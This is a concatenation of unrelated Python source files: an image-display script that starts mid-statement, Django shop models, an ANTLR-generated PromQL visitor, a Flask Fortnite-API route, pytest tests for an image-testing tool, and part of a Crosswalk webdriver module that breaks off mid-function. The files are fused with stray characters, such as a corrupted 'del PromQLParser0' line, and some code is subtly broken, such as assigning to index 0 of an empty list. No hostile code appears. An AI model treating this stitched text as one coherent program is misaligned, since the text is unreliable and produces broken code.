human_dir_validation = get_data(unzipped=True) horse_names = os.listdir(horse_dir) human_names = os.listdir(human_dir) horse_pics = [os.path.join(horse_dir, name) for name in get_random_items(horse_names, number_of_images)] human_pics = [os.path.join(human_dir, name) for name in get_random_items(human_names, number_of_images)] show_images = horse_pics + human_pics print_images(show_images, "Random Training Images") # display some validation images horse_names = os.listdir(horse_dir_validation) human_names = os.listdir(human_dir_validation) horse_pics = [os.path.join(horse_dir_validation, name) for name in get_random_items(horse_names, number_of_images)] human_pics = [os.path.join(human_dir_validation, name) for name in get_random_items(human_names, number_of_images)] show_images = horse_pics + human_pics print_images(show_images, "Random Validation Images") from abc import ABC, abstractmethod class Software(ABC): @abstractmethod def __init__(self, name, type, capacity_consumption, memory_consumption): self.name = name self.type = type self.capacity_consumption = capacity_consumption self.memory_consumption = memory_consumption from django.db import models from django.contrib.auth.models import User # Create your models here. class Customer(models.Model): user = models.OneToOneField(User, null=True, on_delete=models.CASCADE) username = models.CharField(max_length=15, null=True) firstname = models.CharField(max_length=20, null=True) lastname = models.CharField(max_length=20, null=True) phone = models.CharField(max_length=10, null=True) email = models.CharField(max_length=30, null=True) address = models.CharField(max_length=60, null=True) profile_pic = models.ImageField(null=True, blank=True) date_created = models.DateTimeField(auto_now_add = True, null=True) def __str__(self): return self.user.username class Tag(models.Model): name = models.CharField(max_length=200, null=True) def __str__(self): return self.name class Product(models.Model): CATEGORY = ( ('Indoor', 'Indoor'), ('Outdoor', 'Outdoor') ) name = models.CharField(max_length=200, null=True) price = models.FloatField() stock = models.PositiveIntegerField(default=0) category = models.CharField(max_length=200, null=True, choices=CATEGORY) product_pic = models.ImageField(null=True, blank=True) description = models.CharField(max_length=200, null=True, blank=True) date_created = models.DateTimeField(auto_now_add = True, null=True) tags = models.ManyToManyField(Tag) def __str__(self): return self.name class Order(models.Model): STATUS = ( ('Pending', 'Pending'), ('Out for delivery', 'Out for delivery'), ('Delivered','Delivered') ) customer = models.ForeignKey(Customer, null=True, on_delete=models.CASCADE) date_created = models.DateTimeField(auto_now_add = True, null=True) notes = models.CharField(max_length=1000, null=True) status = models.CharField(max_length=200, null=True, choices=STATUS) completed = models.BooleanField(default=False, null=True, blank=True) def __str__(self): return self.customer.user.username + "_" + str(self.id) @property def get_total_items(self): orderItems = self.orderitem_set.all() total_items = sum([item.quantity for item in orderItems]) return total_items @property def get_order_amount(self): orderItems = self.orderitem_set.all() order_amount = sum([item.get_total_price for item in orderItems]) return order_amount class OrderItem(models.Model): order = models.ForeignKey(Order, null=True, blank=True, on_delete=models.CASCADE) product = models.ForeignKey(Product, null=True, blank=True, on_delete=models.SET_NULL) quantity = models.PositiveIntegerField(default=0, null=True, blank=True) date_added = models.DateTimeField(auto_now_add = True) def __str__(self): return self.order.customer.username + "_" + self.product.name @property def get_total_price(self): return self.quantity * self.product.price # Generated from PromQLParser.g4 by ANTLR 4.9.3 from antlr4 import * if __name__ is not None and "." in __name__: from .PromQLParser import PromQLParser else: from PromQLParser import PromQLParser # This class defines a complete generic visitor for a parse tree produced by PromQLParser. class PromQLParserVisitor(ParseTreeVisitor): # Visit a parse tree produced by PromQLParser#expression. def visitExpression(self, ctx:PromQLParser.ExpressionContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#vectorOperation. def visitVectorOperation(self, ctx:PromQLParser.VectorOperationContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#unaryOp. def visitUnaryOp(self, ctx:PromQLParser.UnaryOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#powOp. def visitPowOp(self, ctx:PromQLParser.PowOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#multOp. def visitMultOp(self, ctx:PromQLParser.MultOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#addOp. def visitAddOp(self, ctx:PromQLParser.AddOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#compareOp. def visitCompareOp(self, ctx:PromQLParser.CompareOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#andUnlessOp. def visitAndUnlessOp(self, ctx:PromQLParser.AndUnlessOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#orOp. def visitOrOp(self, ctx:PromQLParser.OrOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#subqueryOp. def visitSubqueryOp(self, ctx:PromQLParser.SubqueryOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#offsetOp. def visitOffsetOp(self, ctx:PromQLParser.OffsetOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#vector. def visitVector(self, ctx:PromQLParser.VectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parens. def visitParens(self, ctx:PromQLParser.ParensContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#instantSelector. def visitInstantSelector(self, ctx:PromQLParser.InstantSelectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcher. def visitLabelMatcher(self, ctx:PromQLParser.LabelMatcherContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcherOperator. def visitLabelMatcherOperator(self, ctx:PromQLParser.LabelMatcherOperatorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcherList. def visitLabelMatcherList(self, ctx:PromQLParser.LabelMatcherListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#matrixSelector. def visitMatrixSelector(self, ctx:PromQLParser.MatrixSelectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#offset. def visitOffset(self, ctx:PromQLParser.OffsetContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#function_. def visitFunction_(self, ctx:PromQLParser.Function_Context): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parameter. def visitParameter(self, ctx:PromQLParser.ParameterContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parameterList. def visitParameterList(self, ctx:PromQLParser.ParameterListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#aggregation. def visitAggregation(self, ctx:PromQLParser.AggregationContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#by. def visitBy(self, ctx:PromQLParser.ByContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#without. def visitWithout(self, ctx:PromQLParser.WithoutContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#grouping. def visitGrouping(self, ctx:PromQLParser.GroupingContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#on_. def visitOn_(self, ctx:PromQLParser.On_Context): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#ignoring. def visitIgnoring(self, ctx:PromQLParser.IgnoringContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#groupLeft. def visitGroupLeft(self, ctx:PromQLParser.GroupLeftContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#groupRight. def visitGroupRight(self, ctx:PromQLParser.GroupRightContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelName. def visitLabelName(self, ctx:PromQLParser.LabelNameContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelNameList. def visitLabelNameList(self, ctx:PromQLParser.LabelNameListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#keyword. def visitKeyword(self, ctx:PromQLParser.KeywordContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#literal. def visitLiteral(self, ctx:PromQLParser.LiteralContext): return self.visitChildren(ctx) del PromQLParser0 import os, requests from flask import Response, request from .app import create_app from .celery import create_celery from .database import db from .api import create_api_manager from .models import User app = create_app() db.init_app(app) api_manager = create_api_manager(app) celery = create_celery(app) @app.route('/api/users', methods=['POST']) def users_create(): data = request.get_json() username = data.get('username') if username is None: return Response('Username Required', 400) url = 'https://fortnite-public-api.theapinetwork.com/users/id?username={}' res = requests.get(url.format(username), headers={'Authorization': os.getenv('FORTNITE_API_AUTH')}).json() if 'error' in res: return Response('Username invalid or unable to locate your data', 400) uid = res.get('uid') user = User.query.filter_by(uid=uid).first() if user is not None: return Response('This player has already registered on FN Dash', 400) user = User(uid=uid, username=username) db.session.add(user) db.session.commit() return Response(status=201) 0 #!/usr/bin/python import mock import pytest import os import inspect import sys from mock import sentinel @pytest.fixture def Config(): from dibctl import config return config.Config @pytest.fixture def do_tests(): from dibctl import do_tests return do_tests @pytest.fixture def mock_env(Config): return Config({ 'nova': { 'flavor': 'some flavor' } }) @pytest.fixture def mock_image(Config): return Config({ 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } }) def test_init_no_tests(do_tests): image = {} env = {} dt = do_tests.DoTests(image, env) assert dt.tests_list == [] def test_init_no_override(do_tests): image = {} dt = do_tests.DoTests(image, {}, image_uuid=sentinel.uuid) assert dt.tests_list == [] assert dt.delete_image is False assert dt.override_image_uuid == sentinel.uuid def test_init_tests(do_tests, Config): image = Config({ 'tests': { 'tests_list': ['test'] } }) env = Config({}) dt = do_tests.DoTests(image, env) assert dt.tests_list == ['test'] @pytest.mark.parametrize("os_env, img, tenv, combined", [ [{}, {}, {}, {}], [{'a': 'b'}, {}, {}, {'a': 'b'}], [{}, {'a': 'b'}, {}, {'a': 'b'}], [{}, {}, {'a': 'b'}, {'a': 'b'}], [{'a': '1'}, {'a': '2'}, {'a': '3'}, {'a': '3'}], [{'a': '1'}, {'a': '2'}, {}, {'a': '2'}], [{'a': '1', 'b': '1'}, {'a': '2', 'c': '1'}, {'a': '3', 'd': '1'}, {'a': '3', 'b': '1', 'c': '1', 'd': '1'}], ]) def test_make_env_vars(do_tests, Config, os_env, img, tenv, combined): img_cfg = Config({'tests': {'environment_variables': img}}) tenv_cfg = Config({'tests': {'environment_variables': tenv}}) with mock.patch.object(do_tests.os, "environ", os_env): dt = do_tests.DoTests(img_cfg, tenv_cfg) assert dt.environment_variables == combined def test_run_test_bad_config(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'one': 1, 'two': 2}, sentinel.config, sentinel.env) def test_run_test_bad_runner(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'badrunner': 1}, sentinel.config, sentinel.env) def test_run_test_duplicate_runner(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'pytest': 1, 'shell': 2}, sentinel.config, sentinel.env) @pytest.mark.parametrize('continue_on_fail, result, expected', [ [True, False, True], [True, True, True], [False, True, True], [False, False, False], ]) @pytest.mark.parametrize('runner', ['pytest', 'shell']) def test_run_test_matrix(do_tests, runner, continue_on_fail, result, expected): dt = do_tests.DoTests({}, {}, continue_on_fail=continue_on_fail) with mock.patch.multiple(do_tests, pytest_runner=mock.DEFAULT, shell_runner=mock.DEFAULT) as mock_rs: mock_r = mock_rs[runner + '_runner'] mock_r.runner.return_value = result assert dt.run_test(sentinel.ssh, {runner: sentinel.path}, sentinel.config, sentinel.var) is expected assert mock_r.runner.called def test_init_ssh_with_data(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'ssh': { 'username': 'user' } } } dt = do_tests.DoTests(image, env) dt.init_ssh(mock.MagicMock()) assert dt.ssh is not None def test_wait_port_good(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': 180 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() assert dt.wait_port(mock_prep_os) is True assert mock_prep_os.wait_for_port.call_args == mock.call(22, 180) @pytest.mark.parametrize('env_timeout, image_timeout, result', [ [1, 2, 2], [2, 1, 2], ]) def test_get_port_timeout_uses_max(do_tests, Config, env_timeout, image_timeout, result): env = { 'nova': { 'flavor': 'some flavor' }, 'tests': { 'port_wait_timeout': env_timeout } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': image_timeout } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, result) @pytest.mark.parametrize('true_value', [ 'was_removed', 'preexisted', 'deletable' ]) def test_report_item_silent(do_tests, true_value, capsys): data = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': '' } data[true_value] = True do_tests.DoTests.report_item('name', data) assert 'will not be removed' not in capsys.readouterr()[0] def test_report_ssh(do_tests, capsys): ssh = mock.MagicMock() ssh.command_line.return_value = ['some', 'command', 'line'] do_tests.DoTests.report_ssh(ssh) assert 'some command line' in capsys.readouterr()[0] def test_report(do_tests, mock_env, mock_image): dt = do_tests.DoTests(mock_image, mock_env) prep_os = mock.MagicMock() mock_status = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': 'some_name' } prep_os.image_status.return_value = mock_status prep_os.instance_status.return_value = mock_status prep_os.keypair_status.return_value = mock_status dt.report(prep_os) def test_report_item(do_tests, capsys): data = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': '' } do_tests.DoTests.report_item('name', data) assert 'will not be removed' in capsys.readouterr()[0] def test_get_port_timeout_uses_env(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' }, 'tests': { 'port_wait_timeout': 42 } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 42) def test_get_port_timeout_uses_img(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': 42 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 42) def test_get_port_timeout_uses_default(do_tests): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 61) # magical constant! def test_wait_port_no_port(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() assert dt.wait_port(mock_prep_os) is False def test_wait_port_timeout(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 42 } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() mock_prep_os.wait_for_port.return_value = False with pytest.raises(do_tests.PortWaitError): dt.wait_port(mock_prep_os) @pytest.mark.parametrize('port', [False, 22]) def test_process_minimal(do_tests, port, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': port, 'tests_list': [] } } dt = do_tests.DoTests(image, env) with mock.patch.object(do_tests.prepare_os, "PrepOS"): assert dt.process(False, False) is True assert 'passed' in capsys.readouterr()[0] def refactor_test_process_port_timeout(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [] } } dt = do_tests.DoTests(image, env) with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_prep_os.wait_for_port.return_value = False mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter with pytest.raises(do_tests.TestError): dt.process(False, False) def test_process_with_tests(do_tests, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } } dt = do_tests.DoTests(image, env) with mock.patch.multiple(do_tests, pytest_runner=mock.DEFAULT, shell_runner=mock.DEFAULT): with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter assert dt.process(False, False) is True def test_process_shell_only(do_tests, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } } with mock.patch.object(do_tests.prepare_os, "PrepOS"): with mock.patch.object(do_tests.DoTests, "open_shell", return_value=sentinel.result): dt = do_tests.DoTests(image, env) assert dt.process(shell_only=True, shell_on_errors=False) == sentinel.result def test_process_all_tests_fail(do_tests, capsys, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(Config(image), Config(env)) dt.ssh = mock.MagicMock() with mock.patch.object(do_tests.pytest_runner, "runner") as runner: runner.side_effect = [False, ValueError("Shouldn't be called")] with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter assert dt.process(False, False) is False assert runner.call_count == 1 def test_process_all_tests_fail_open_shell(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(Config(image), Config(env)) dt.ssh = mock.MagicMock() with mock.patch.object(do_tests.pytest_runner, "runner") as runner: runner.side_effect = [False, ValueError("Shouldn't be called")] with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter with mock.patch.object(dt, 'open_shell') as mock_open_shell: assert dt.process(False, shell_on_errors=True) is False assert mock_open_shell.called @pytest.mark.parametrize('result', [True, False]) def test_run_all_tests(do_tests, result, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } with mock.patch.object(do_tests.DoTests, "run_test", return_value=result): dt = do_tests.DoTests(Config(image), Config(env)) dt.ssh = mock.MagicMock() assert dt.run_all_tests(mock.MagicMock()) is result @pytest.mark.parametrize('retval, keep', [ [0, False], [1, False], [42, True] ]) def test_open_shell(do_tests, retval, keep): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'ssh': {'username': 'user'}, 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(image, env) mock_ssh = mock.MagicMock() mock_ssh.shell.return_value = retval dt.open_shell(mock_ssh, 'reason') assert dt.keep_failed_instance == keep assert 'exit 42' in mock_ssh.shell.call_args[0][1] def test_open_shell_no_ssh_config(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { } dt = do_tests.DoTests(image, env) with pytest.raises(do_tests.TestError): dt.open_shell(None, 'reason') @pytest.mark.parametrize('kins', [True, False]) @pytest.mark.parametrize('kimg', [True, False]) def test_check_if_keep_stuff_after_fail_code_coverage(do_tests, kins, kimg): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(image, env) dt.keep_failed_instance = kins dt.keep_failed_image = kimg dt.check_if_keep_stuff_after_fail(mock.MagicMock()) if __name__ == "__main__": ourfilename = os.path.abspath(inspect.getfile(inspect.currentframe())) currentdir = os.path.dirname(ourfilename) parentdir = os.path.dirname(currentdir) file_to_test = os.path.join( parentdir, os.path.basename(parentdir), os.path.basename(ourfilename).replace("test_", '', 1) ) pytest.main([ "-vv", "--cov", file_to_test, "--cov-report", "term-missing" ] + sys.argv) wuyuehang/crosswalk-webdriver-python __all__ = ["WebViewImpl"] from base.log import VLOG from base.bind import Bind from web_view import WebView from status import * from ui_events import * from js import * from geolocation_override_manager import GeolocationOverrideManager from debugger_tracker import DebuggerTracker from javascript_dialog_manager import JavaScriptDialogManager from navigation_tracker import NavigationTracker from frame_tracker import FrameTracker from devtools_client_impl import DevToolsClientImpl from heap_snapshot_taker import HeapSnapshotTaker from dom_tracker import DomTracker import json import copy # EvaluateScriptReturnType ReturnByValue = 0 ReturnByObject = 1 # return status and context_id def _GetContextIdForFrame(tracker, frame): if not frame: return Status(kOk), 0 (status, context_id) = tracker.GetContextIdForFrame(frame) if status.IsError(): return status, 0 return Status(kOk), context_id def _GetMouseEventAsString(typer): if typer == kPressedMouseEventType: return "mousePressed" elif typer == kReleasedMouseEventType: return "mouseReleased" elif typer == kMovedMouseEventType: return "mouseMoved" else: return "" def _GetTouchEventAsString(typer): if typer == kTouchStart: return "touchStart" elif typer == kTouchEnd: return "touchEnd" elif typer == kTouchMove: return "touchMove" else: return "" def _GetMouseButtonAsString(typer): if typer == kLeftMouseButton: return "left" elif typer == kMiddleMouseButton: return "middle" elif typer == kRightMouseButton: return "right" elif typer == kNoneMouseButton: return "none" else: return "" def _GetKeyEventAsString(typer): if typer == kKeyDownEventType: return "keyDown" elif typer == kKeyUpEventType: return "keyUp" elif typer == kRawKeyDownEventType: return "rawKeyDown" elif typer == kCharEventType: return "char" else: return "" def _GetPointStateString(typer): if typer == kTouchStart: return "touchPressed" elif typer == kTouchEnd: return "touchReleased" elif typer == kTouchMove: return "touchMoved" else: return "" # result = response.result.result def _EvaluateScript(client, context_id, expression, return_type, result): params = {} params["expression"] = expression if context_id: params["contextId"] = context_id params["returnByValue"] = (return_type == ReturnByValue) cmd_result = {} status = client.SendCommandAndGetResult("Runtime.evaluate", params, cmd_result) if status.IsError(): return status was_thrown = cmd_result.get("wasThrown", None) if type(was_thrown) != bool: return Status(kUnknownError, "Runtime.evaluate missing 'wasThrown'") if was_thrown: description = cmd_result.get("result.description", "unknown") return Status(kUnknownError, "Runtime.evaluate threw exception: " + description) unscoped_result = {} unscoped_result = cmd_result.get("result") if type(unscoped_result) != dict: return Status(kUnknownError, "evaluate missing dictionary 'result'") result.clear() result.update(unscoped_result) return Status(kOk) # resturn status, got_object and object_id def _EvaluateScriptAndGetObject(client, context_id, expression): result = {} object_id = "" status = _EvaluateScript(client, context_id, expression, ReturnByObject, result) if status.IsError(): return (status, False, object_id) if not result.has_key("objectId"): return (Status(kOk), False, object_id) object_id = result.get("objectId") if type(object_id) != str: return (Status(kUnknownError, "evaluate has invalid 'objectId'"), False, object_id) return (Status(kOk), True, object_id) # result = response.result.result.value def _EvaluateScriptAndGetValue(client, context_id, expression, result): temp_result = {} status = _EvaluateScript(client, context_id, expression, ReturnByValue, temp_result) if status.IsError(): return status typer = temp_result.get("type") if type(typer) != str: return Status(kUnknownError, "Runtime.evaluate missing string 'type'") if typer == "undefined": result.clear() else: if not temp_result.has_key("value"): return Status(kUnknownError, "Runtime.evaluate missing 'value'") result.clear() # packed in a dict to make pass like point if type(temp_result["value"]) != dict: result.update({"value": temp_result["value"]}) else: result.update(temp_result["value"]) return Status(kOk) # return status, found_node and node_id def _GetNodeIdFromFunction(client, context_id, function, args): node_id = -1 try: js = json.dumps(args) except: return (Status(kUnknownError, "json dumps error"), False, node_id) # TODO(wyh): Second null should be array of shadow host ids. expression = "(%s).apply(null, [null, %s, %s, true])" % (kCallFunctionScript, function, js) (status, got_object, element_id) = _EvaluateScriptAndGetObject(client, context_id, expression) if status.IsError(): return (status, False, node_id) if not got_object: return (Status(kOk), False, node_id) cmd_result = {} params = {} params["objectId"] = element_id status = client.SendCommandAndGetResult("DOM.requestNode", params, cmd_result) # Release the remote object before doing anything else. params = {} params["objectId"] = element_id release_status = client.SendCommand("Runtime.releaseObject", params) if release_status.IsError(): VLOG(3, "Failed to release remote object: " + release_status.Message()) if status.IsError(): return (status, False, node_id) node_id = cmd_result.get("nodeId") if type(node_id) != int: return (Status(kUnknownError, "DOM.requestNode missing int 'nodeId'"), False, node_id) return (Status(kOk), True, node_id) def _ParseCallFunctionResult(dic, result): if type(dic) != dict: return Status(kUnknownError, "call function result must be a dictionary") status_code = dic.get("status", None) if type(status_code) != int: return Status(kUnknownError, "call function result missing int 'status'") if status_code != kOk: message = dic.get("value", "") return Status(status_code, message) if not dic.has_key("value"): return Status(kUnknownError, "call function result missing 'value'") result.clear() result.update({"value": dic["value"]}) return Status(kOk) class WebViewImpl(WebView): def __init__(self, sid, build_no, client): WebView.__init__(self, sid) self.build_no = build_no self.client = client # in case of casually init DevToolsClientImpl, may cause wrong init of DevToolsEventListener if isinstance(client, DevToolsClientImpl): self.dom_tracker = DomTracker(client) self.frame_tracker = FrameTracker(client) self.navigation_tracker = NavigationTracker(client) self.dialog_manager = JavaScriptDialogManager(client) self.geolocation_override_manager = GeolocationOverrideManager(client) self.heap_snapshot_taker = HeapSnapshotTaker(client) #self.debugger = DebuggerTracker(client) else: self.dom_tracker = None self.frame_tracker = None self.navigation_tracker = None self.dialog_manager = None self.geolocation_override_manager = None self.heap_snapshot_taker = None #self.debugger = None def Update(self, other): self.build_no = other.build_no self.client = other.client self.dom_tracker = other.dom_tracker self.frame_tracker = other.frame_tracker self.navigation_tracker = other.navigation_tracker self.dialog_manager = other.dialog_manager self.geolocation_override_manager = other.geolocation_override_manager self.heap_snapshot_taker = other.heap_snapshot_taker #self.debugger = other.debugger # Overridden from WebView: def GetId(self): return self.sid def WasCrashed(self): return self.client.WasCrashed() def ConnectIfNecessary(self): return self.client.ConnectIfNecessary() def HandleReceivedEvents(self): return self.client.HandleReceivedEvents() def Load(self, url): # Javascript URLs will cause a hang while waiting for the page to stop # loading, so just disallow. if url.lower().startswith("javascript"): return Status(kUnknownError, "unsupported protocol") params = {} params["url"] = url return self.client.SendCommand("Page.navigate", params) def Reload(self): params = {} params["ignoreCache"] = False return self.client.SendCommand("Page.reload", params) def DispatchTouchEvents(self, events=[]): for it in events: params = {} params["type"] = _GetTouchEventAsString(it.typer) point_list = [] point = {} point["state"] = _GetPointStateString(it.typer) point["x"] = it.x point["y"] = it.y point_list[0] = point params["touchPoints"] = point_list status = self.client.SendCommand("Input.dispatchTouchEvent", params) if status.IsError(): return status return Status(kOk) def DispatchKeyEvents(self, events=[]): for it in events: params = {} params["type"] = _GetKeyEventAsString(it.typer) if it.modifiers & kNumLockKeyModifierMask: params["isKeypad"] = True params["modifiers"] = it.modifiers & (kNumLockKeyModifierMask - 1) else: params["modifiers"] = it.modifiers params["text"] = it.modified_text params["unmodifiedText"] = it.unmodified_text params["nativeVirtualKeyCode"] = it.key_code params["windowsVirtualKeyCode"] = it.key_code status = self.client.SendCommand("Input.dispatchKeyEvent", params) if status.IsError(): return status return Status(kOk) def DispatchMouseEvents(self, events, frame): for it in events: params = {} params["type"] = _GetMouseEventAsString(it.typer) params["x"] = it.x params["y"] = it.y params["modifiers"] = it.modifiers params["button"] = _GetMouseButtonAsString(it.button) params["clickCount"] = it.click_count status = self.client.SendCommand("Input.dispatchMouseEvent", params) if status.IsError(): return status if self.build_no < 1569 and it.button == kRightMouseButton and it.typer == kReleasedMouseEventType: args = [] args.append(it.x) args.append(it.y) args.append(it.modifiers) result = {} status = self.CallFunction(frame, kDispatchContextMenuEventScript, args, result) if status.IsError(): return status return Status(kOk) def GetCookies(self, cookies=[]): params = {} result = {} status = self.client.SendCommandAndGetResult("Page.getCookies", params, result) if status.IsError(): return status cookies_tmp = result.get("cookies") if type(cookies_tmp) != list: return Status(kUnknownError, "DevTools didn't return cookies") cookies[:] = cookies_tmp return Status(kOk) def DeleteCookie(self, name, url): params = {} params["cookieName"] = name params["url"] = url return self.client.SendCommand("Page.deleteCookie", params) def GetJavaScriptDialogManager(self): return self.dialog_manager def OverrideGeolocation(self, geoposition): return self.geolocation_override_manager.OverrideGeolocation(geoposition) def EvaluateScript(self, frame, expression, result): (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status return _EvaluateScriptAndGetValue(self.client, context_id, expression, result) def CallFunction(self, frame, function, args, result): try: js = json.dumps(args) except: return Status(kUnknownError) # TODO(wyh): Second null should be array of shadow host ids. expression = "(%s).apply(null, [null, %s, %s])" % (kCallFunctionScript, function, js) temp_result = {} status = self.EvaluateScript(frame, expression, temp_result) if status.IsError(): return status return _ParseCallFunctionResult(temp_result, result) def CallAsyncFunctionInternal(self, frame, function, args, is_user_supplied, timeout, result): async_args = [] async_args.append("return (" + function + ").apply(null, arguments);") async_args.extend(args) async_args.append(is_user_supplied) # timeout should be in milliseconds async_args.append(timeout) tmp = {} status = self.CallFunction(frame, kExecuteAsyncScriptScript, async_args, tmp) if status.IsError(): return status kDocUnloadError = "document unloaded while waiting for result" kQueryResult = "function() {\ var info = document.$xwalk_asyncScriptInfo;\ if (!info)\ return {status: %d, value: '%s'};\ var result = info.result;\ if (!result)\ return {status: 0};\ delete info.result;\ return result;\ }" % (kJavaScriptError, kDocUnloadError) while True: no_args = [] query_value = {} status = self.CallFunction(frame, kQueryResult, no_args, query_value) if status.IsError(): if status.Code() == kNoSuchFrame: return Status(kJavaScriptError, kDocUnloadError) return status if type(query_value) != dict: return Status(kUnknownError, "async result info is not a dictionary") status_code = query_value.get("status", None) if type(status_code) != int: return Status(kUnknownError, "async result info has no int 'status'") if status_code != kOk: return 